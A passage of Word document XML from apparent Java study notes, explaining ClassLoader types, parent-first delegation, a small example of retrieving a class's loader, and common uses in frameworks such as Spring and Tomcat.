    <w:p w14:paraId="028FC41A" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="160572DD">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6062C294" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">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Types of ClassLoaders in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF9D41" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Java has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hierarchical delegation model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and these are the key built-in classload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60"/>
        <w:gridCol w:w="5377"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w14:paraId="70AD72E2" w14:textId="77777777" w:rsidTr="00DB24C2">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D0B044" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B06D887" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w14:paraId="1BED91D5" w14:textId="77777777" w:rsidTr="00DB24C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="491D2FA7" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">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Bootstrap ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FB9F4B4" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Loads </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>core Java classes</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the rt.jar (like java.lang.*)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w14:paraId="5FF7B384" w14:textId="77777777" w:rsidTr="00DB24C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04005659" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">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Extension ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BFD5021" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Loads classes from the ext directory ($JAVA_HOME/lib/ext)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w14:paraId="0B1D99A8" w14:textId="77777777" w:rsidTr="00DB24C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CAEAB44" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">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System/Application ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13ED2127" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Loads classes from the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>classpath</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g., your app code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="099C7643" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">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Custom ClassLoaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52718C9B" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>You can create your own ClassLoader by extending ClassLoader to load classes dynamically (e.g., plugin systems, frameworks like OSGi).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692BECD9" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6A1432EB">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A392A" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">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Delegation Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDFF585" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a class is requested to be loaded, the process follows this </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent-first delegation model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D2FF1" w14:textId="272C11C2" w:rsidR="000D73AA" w:rsidRPr="00CE4B95" w:rsidRDefault="000D73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36407"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>App</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lassLoad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x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lassLoad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Bootstrap</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lassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0869552A" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Each loader </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delegates to its parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before trying to load the class itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4E1FB" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="23F248C6">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8E3D18" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">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Example: Get the ClassLoader of a Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D74C9" w14:textId="77777777" w:rsidR="00724FB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00724F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187365"/>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Demo</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D8602DC" w14:textId="77777777" w:rsidR="00724FB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00724F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18736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9288278" w14:textId="77777777" w:rsidR="00724FB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00724F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18736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lassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> cl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Demo</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clas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ClassLoader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6222198C" w14:textId="77777777" w:rsidR="00724FB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00724F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18736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ClassLoader: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l</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513AF589" w14:textId="77777777" w:rsidR="00724FB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00724F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18736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6A18C25" w14:textId="054A8951" w:rsidR="00724FB3" w:rsidRPr="00CE4B95" w:rsidRDefault="00724F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187365"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4819D100" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="20DEA0E2">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173CEEF" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">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Real-World Use Cases of ClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D669CF" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hot deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in application servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A612E0" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dynamic loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of plugins/modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2EEBC6" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Custom loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of encrypted/obfuscated classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F17E0F3" w14:textId="77777777" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="85"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Used heavily in frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</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Hibernate</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Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D43826" w14:textId="52550467" w:rsidR="006767AE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006767AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="697BED8C">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C2E98" w14:textId="08356816" w:rsidR="004C1F2C" w:rsidRPr="00CE4B95" w:rsidRDefault="004C1F2C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc196307487"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why is java more secure?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
